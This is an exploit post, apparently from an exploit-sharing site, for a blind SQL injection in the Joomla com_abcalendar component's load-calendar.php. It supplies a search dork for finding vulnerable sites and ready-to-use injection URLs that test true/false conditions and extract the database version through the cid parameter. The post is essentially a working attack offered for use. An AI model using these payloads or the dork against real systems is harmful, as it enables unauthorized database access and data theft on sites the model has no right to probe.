facebook facebook twitter rss

Joomla Component com_abcalendar Blind Injection Vulnerability

Author: AtT4CKxT3rR0r1ST , Published: 10-06-2013
Joomla Component com_abcalendar Blind Injection Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Dork : inurl:"com_abcalendar"
####################################################################
===[ Exploit ]===

Sql Injection:
==============

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3[Blind]

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and 1=1 >> True
www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and 1=2 >> False

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and substring(@@version,1,1)=5 >> True
www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and substring(@@version,1,1)=4 >> False
####################################################################

Like us on Facebook :